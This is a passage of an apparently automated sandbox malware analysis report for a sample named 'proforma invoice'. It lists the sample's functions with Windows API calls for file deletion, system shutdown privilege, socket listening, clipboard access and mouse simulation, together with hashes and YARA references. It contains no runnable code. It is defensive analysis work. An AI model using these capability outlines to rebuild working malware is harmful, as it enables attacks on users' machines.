                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                  • String ID: *.*
                  • API String ID: 1409584000-438819550
                  • Opcode ID: f5a22021658a313e73e0bb0bfc2b78090c85982b245665379fed58100a5e134a
                  • Instruction ID: 135f7a577104f8ffb9f046c5d5a9a671983129dfddc80e4c17a180d43697f195
                  • Opcode Fuzzy Hash: f5a22021658a313e73e0bb0bfc2b78090c85982b245665379fed58100a5e134a
                  • Instruction Fuzzy Hash: D331A032540259AADB14AFF4DC59ADE7BECEF09320F644195F815E30E0DB34DE848B64
                  Function 00B1979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B197BE
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B19819
                  • FindClose.KERNEL32(00000000), ref: 00B19824
                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00B19840
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B19890
                  • SetCurrentDirectoryW.KERNEL32(00B66B7C), ref: 00B198AE
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B198B8
                  • FindClose.KERNEL32(00000000), ref: 00B198C5
                  • FindClose.KERNEL32(00000000), ref: 00B198D5
                    • Part of subcall function 00B0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B0DB00
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                  • String ID: *.*
                  • API String ID: 2640511053-438819550
                  • Opcode ID: 5efaf9fdcfbe3d99f43a28fc1910b36ef830c9818cfdf9b49662896fe2b0d8d3
                  • Instruction ID: 6aacb86cff4e30b42c572f21aac517bd0d4ac6255e11674fe6e76f47f62a1053
                  • Opcode Fuzzy Hash: 5efaf9fdcfbe3d99f43a28fc1910b36ef830c9818cfdf9b49662896fe2b0d8d3
                  • Instruction Fuzzy Hash: 0A31B232540659AADB14AFB4DC59ADE7BECEF06360F6441A5F814A30E0DB30D9858B64
                  Function 00B18195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 00B18257
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B18267
                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B18273
                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B18310
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18324
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18356
                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B1838C
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18395
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CurrentDirectoryTime$File$Local$System
                  • String ID: *.*
                  • API String ID: 1464919966-438819550
                  • Opcode ID: 000798120dfae5a995e1357b9b35f6b85fcca76af0153e45d624bcef287bfa64
                  • Instruction ID: fcdd8be76debd1d10b72597b7a4f3a211f0e307830f744f09ccb6ad029fbacf2
                  • Opcode Fuzzy Hash: 000798120dfae5a995e1357b9b35f6b85fcca76af0153e45d624bcef287bfa64
                  • Instruction Fuzzy Hash: 86618A725043059FCB10EF60D8809AFB3E8FF8A310F44896EF99993291DB31E945CB92
                  Function 00B0D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                    • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B0D122
                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B0D1DD
                  • MoveFileW.KERNEL32(?,?), ref: 00B0D1F0
                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B0D20D
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0D237
                    • Part of subcall function 00B0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B0D21C,?,?), ref: 00B0D2B2
                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00B0D253
                  • FindClose.KERNEL32(00000000), ref: 00B0D264
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                  • String ID: \*.*
                  • API String ID: 1946585618-1173974218
                  • Opcode ID: 2bbea67a55e2784600a09b85aeebec43d971aebcb136ccb48c0a0219384da78e
                  • Instruction ID: 69fb2ef38cf13303d775503ceca7154d498df672a156bcd580c5911a42113a5a
                  • Opcode Fuzzy Hash: 2bbea67a55e2784600a09b85aeebec43d971aebcb136ccb48c0a0219384da78e
                  • Instruction Fuzzy Hash: 97615C3180111DAECF05EBE0DA929EEBBB5AF55340F2481A9E406771D1EF35AF09CB61
                  Function 00B1ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                  • String ID:
                  • API String ID: 1737998785-0
                  • Opcode ID: 6990be5bf4f3f99e583d1407a4aa186fd49b62f81c91f0cd3d757dc8621bb4be
                  • Instruction ID: 1fd8fddc1864ee0a993a603d90cdaf1eaf3c8d7c01e13091c1d4a12c7fcc8a44
                  • Opcode Fuzzy Hash: 6990be5bf4f3f99e583d1407a4aa186fd49b62f81c91f0cd3d757dc8621bb4be
                  • Instruction Fuzzy Hash: C241B435204611AFE310DF59D889F59BBE1FF44318F54C099E8259B6A2CB35EC81CB90
                  Function 00B0E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                    • Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                    • Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A
                  • ExitWindowsEx.USER32(?,00000000), ref: 00B0E932
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                  • String ID: $ $@$SeShutdownPrivilege
                  • API String ID: 2234035333-3163812486
                  • Opcode ID: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
                  • Instruction ID: 9a3b8cbe9c187b871ddb6861d80ea139ca88f490fd0d25d1458113d302f2c974
                  • Opcode Fuzzy Hash: ae01a36c056c9ea6d34ac3138fa4a1d4f54265c39b3792bd3d0e51a4a471bb3e
                  • Instruction Fuzzy Hash: 8D01D673610211AFEB5426B89C8ABBF7ADCE714750F154DA2FD22F31D1DAB19C408294
                  Function 00B21204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                  Download Yara Rule
                  APIs
                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B21276
                  • WSAGetLastError.WSOCK32 ref: 00B21283
                  • bind.WSOCK32(00000000,?,00000010), ref: 00B212BA
                  • WSAGetLastError.WSOCK32 ref: 00B212C5
                  • closesocket.WSOCK32(00000000), ref: 00B212F4
                  • listen.WSOCK32(00000000,00000005), ref: 00B21303
                  • WSAGetLastError.WSOCK32 ref: 00B2130D
                  • closesocket.WSOCK32(00000000), ref: 00B2133C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$closesocket$bindlistensocket
                  • String ID:
                  • API String ID: 540024437-0
                  • Opcode ID: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
                  • Instruction ID: 21f833be267dc91376bd467332b494f493f5dad6ed0095f8e1046d87b4cd52aa
                  • Opcode Fuzzy Hash: e6fdd29c97bc410a1a51731ea862c47453cb42bb1d7d6f308dd3dfe090cd55ff
                  • Instruction Fuzzy Hash: 4C416031A00110EFD710DF68D584B2ABBE6EF56314F288598E85A9F2D6C771ED81CBA1
                  Function 00B0D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                    • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B0D420
                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B0D470
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0D481
                  • FindClose.KERNEL32(00000000), ref: 00B0D498
                  • FindClose.KERNEL32(00000000), ref: 00B0D4A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                  • String ID: \*.*
                  • API String ID: 2649000838-1173974218
                  • Opcode ID: 1c54e2369a3b65236e74e1044076eb6699350c456bf689c2613148d7b1bc39a9
                  • Instruction ID: 53ecac252129edfabf86fa6edd83254b394f4351e530006b4c74593a9745ccd3
                  • Opcode Fuzzy Hash: 1c54e2369a3b65236e74e1044076eb6699350c456bf689c2613148d7b1bc39a9
                  • Instruction Fuzzy Hash: 48317E310083419BC701EFA4D9919AFBBE8BE96300F444A5DF4D5932D1EB34AA09CB63
                  Function 00ADE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: 3c0ef62c40229cec6cda2a6e83fd7cc4ee237f9d88dc3c264c1f8cbcff205d82
                  • Instruction ID: b534a735dd88f59411d6240c58beb37ee81322cbe11e42393960f5987c94e018
                  • Opcode Fuzzy Hash: 3c0ef62c40229cec6cda2a6e83fd7cc4ee237f9d88dc3c264c1f8cbcff205d82
                  • Instruction Fuzzy Hash: 4DC22771E086288FDB25DF289D407EAB7B5EB49305F1541EBD84EEB240E775AE818F40
                  Function 00B1648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 00B164DC
                  • CoInitialize.OLE32(00000000), ref: 00B16639
                  • CoCreateInstance.OLE32(00B3FCF8,00000000,00000001,00B3FB68,?), ref: 00B16650
                  • CoUninitialize.OLE32 ref: 00B168D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                  • String ID: .lnk
                  • API String ID: 886957087-24824748
                  • Opcode ID: 9aec7c1e60d7919d0a7118f99f60af669ac306fe3d264881dfdf1e2c5aa96f44
                  • Instruction ID: 3e8e5443ccd9edc074f6b01ba30964a65be97cff8a39c544244379a615fe1771
                  • Opcode Fuzzy Hash: 9aec7c1e60d7919d0a7118f99f60af669ac306fe3d264881dfdf1e2c5aa96f44
                  • Instruction Fuzzy Hash: D1D15871508301AFC304EF24C981AABB7E9FF99704F54896DF5958B2A1EB30ED45CB92
                  Function 00B222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                  Download Yara Rule
                  APIs
                  • GetForegroundWindow.USER32(?,?,00000000), ref: 00B222E8
                    • Part of subcall function 00B1E4EC: GetWindowRect.USER32(?,?), ref: 00B1E504
                  • GetDesktopWindow.USER32 ref: 00B22312
                  • GetWindowRect.USER32(00000000), ref: 00B22319
                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B22355
                  • GetCursorPos.USER32(?), ref: 00B22381
                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B223DF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                  • String ID:
                  • API String ID: 2387181109-0
                  • Opcode ID: 108257b0b4d56ae64f5c13afb2fafecefb8aed1ac786c6b93678fc190dbcd170
                  • Instruction ID: 33e90903394f0d318b6f22e5f53192137567a4c4b400ae2db0a29eed6bbe0535
                  • Opcode Fuzzy Hash: 108257b0b4d56ae64f5c13afb2fafecefb8aed1ac786c6b93678fc190dbcd170
                  • Instruction Fuzzy Hash: 9E31FE72504315AFCB20DF54D849B9BBBE9FF88310F100A59F998E7181DB34EA08CB96
                  Function 00B19B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00B19B78
                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B19C8B
                    • Part of subcall function 00B13874: GetInputState.USER32 ref: 00B138CB
                    • Part of subcall function 00B13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B13966
                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B19BA8
                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B19C75
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                  • String ID: *.*
                  • API String ID: 1972594611-438819550
                  • Opcode ID: 909ef9b64c076795ad1fb60ea9c3b31f56d299d5b0d86afd80a0e1c382eb2fba
                  • Instruction ID: 041b9fca0189571445e2e61af249377ede8bf373f61f04d3da2f8f1a804c0ba8
                  • Opcode Fuzzy Hash: 909ef9b64c076795ad1fb60ea9c3b31f56d299d5b0d86afd80a0e1c382eb2fba
                  • Instruction Fuzzy Hash: C341817190424AAFCF55DFA4C995AEEBBF8EF05310F644095F845A3291EB309E84CFA0
                  Function 00AB997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AB9A4E
                  • GetSysColor.USER32(0000000F), ref: 00AB9B23
                  • SetBkColor.GDI32(?,00000000), ref: 00AB9B36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Color$LongProcWindow
                  • String ID:
                  • API String ID: 3131106179-0
                  • Opcode ID: 65b76b4a7695bee474751d19e07343786ed35720c412dc14a00f7e9862a42864
                  • Instruction ID: b7245334d9f91cbc874a39879475187470abb355df4f274b72c88254a1e6188b
                  • Opcode Fuzzy Hash: 65b76b4a7695bee474751d19e07343786ed35720c412dc14a00f7e9862a42864
                  • Instruction Fuzzy Hash: E0A10770118548AEE728AB7C8C99EFF3AADDF42380F25410DF712D6693CE259D42D272
                  Function 00B21806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
                    • Part of subcall function 00B2304E: _wcslen.LIBCMT ref: 00B2309B
                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B2185D
                  • WSAGetLastError.WSOCK32 ref: 00B21884
                  • bind.WSOCK32(00000000,?,00000010), ref: 00B218DB
                  • WSAGetLastError.WSOCK32 ref: 00B218E6
                  • closesocket.WSOCK32(00000000), ref: 00B21915
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                  • String ID:
                  • API String ID: 1601658205-0
                  • Opcode ID: dec17524cdf23630132ecf874c8b4828046c50325dd870d273860041ac80fab0
                  • Instruction ID: 4230128f1b48b1f44997ff55e7442b36e42af7a47653bfba389ba881e0f2ce9e
                  • Opcode Fuzzy Hash: dec17524cdf23630132ecf874c8b4828046c50325dd870d273860041ac80fab0
                  • Instruction Fuzzy Hash: 8651B471A00210AFEB10AF24D9C6F6A77E5EB45718F188498F90A6F3D3D771ED418BA1
                  Function 00B31C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                  • String ID:
                  • API String ID: 292994002-0
                  • Opcode ID: 3c0129d31e757b12e474bbf73ad7bc1b02b034db9dabd190f8b42674949a2ea2
                  • Instruction ID: a0a26260ebd0e644f76573c787c316efaf8392e114f7788c5bd23f7a4622a5c2
                  • Opcode Fuzzy Hash: 3c0129d31e757b12e474bbf73ad7bc1b02b034db9dabd190f8b42674949a2ea2
                  • Instruction Fuzzy Hash: AF21A3317402105FD7208F2ED894B6A7BE9EF95325F7994A8E8469F351CB71EC42CB90
                  Function 00AA8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                  • API String ID: 0-1546025612
                  • Opcode ID: da6ab05918eb5edcc9ab89880b525e1dc93b90efbc01f1663b0c7e1e2cdf489d
